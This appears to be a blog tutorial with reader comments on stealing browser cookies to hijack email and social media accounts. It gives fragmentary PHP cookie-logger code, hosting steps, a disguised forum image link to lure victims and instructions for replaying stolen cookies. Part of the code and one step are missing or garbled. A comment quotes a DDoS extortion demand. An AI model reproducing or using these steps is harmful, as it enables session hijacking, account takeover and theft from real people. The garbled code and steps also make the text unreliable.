How to Hack Email Account with Cookie stealing
Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut,Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.Step 1
First you have to create a file which can capture a person's cookie.So follow the following script
Now you have to change to your your site,Remember one thing you should not upload the files into a directory.Now open notepad and paste the script in it and save it as fun.gif
Step 3
Copy the Following Script into a Notepad File and Save the file as cookielogger.php:
$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
if (!$handle = fopen($filename, ‘a’))
echo “Temporary Server Error,Sorry for the inconvenience.”;
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
echo “Temporary Server Error,Sorry for the inconvenience.”;
echo “Temporary Server Error,Sorry for the inconvenience.”;
echo “Temporary Server Error,Sorry for the inconvenience.”;
Step 4:
Create a new Notepad File and Save it as logfile.txt
Upload this file to your server
cookielogger.php ->
logfile.txt -> (chmod 777)
fun.gif ->
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :Add Your Text Here
Step 5:Go to the victim forum and insert this code in the signature or a post :
Code: [url=[color=red][/color]/fun.gif][img][color=red][/color]fun.jpg[/img][/url]
So the person who click it will think it is fun.jpg but it redirects to fun.gif
Step 6
So if you click the image you will get a temporary error and you will find the cookie in the logfile.txt
step 7
And something like this will be stored in your "logfile.txt"
Step 8
To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.Now for this you will need a firefox addon named add and edit cookies
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Step 2
ReplyDeleteNow you have to change to your your site,Remember one thing you should not upload the files into a directory.Now open notepad and paste the script in it and save it as fun.gif
what to copy for fun.gif ?
because step 3 is for cookielogger.php:
please reply
please send me answer at
ReplyDeleteplease please
Hi "smart guy" don;t send me blackmails cos I'll call some friends from my old days ... This is what you just send to me:
Delete> Ddos warning !!
> I want 50$ on my Lr U2551325 If you not pay i will finish your > site under 10 minutes
> your time starts now.
Bro password recovery method by 3 frend is now blocked plz check & reply !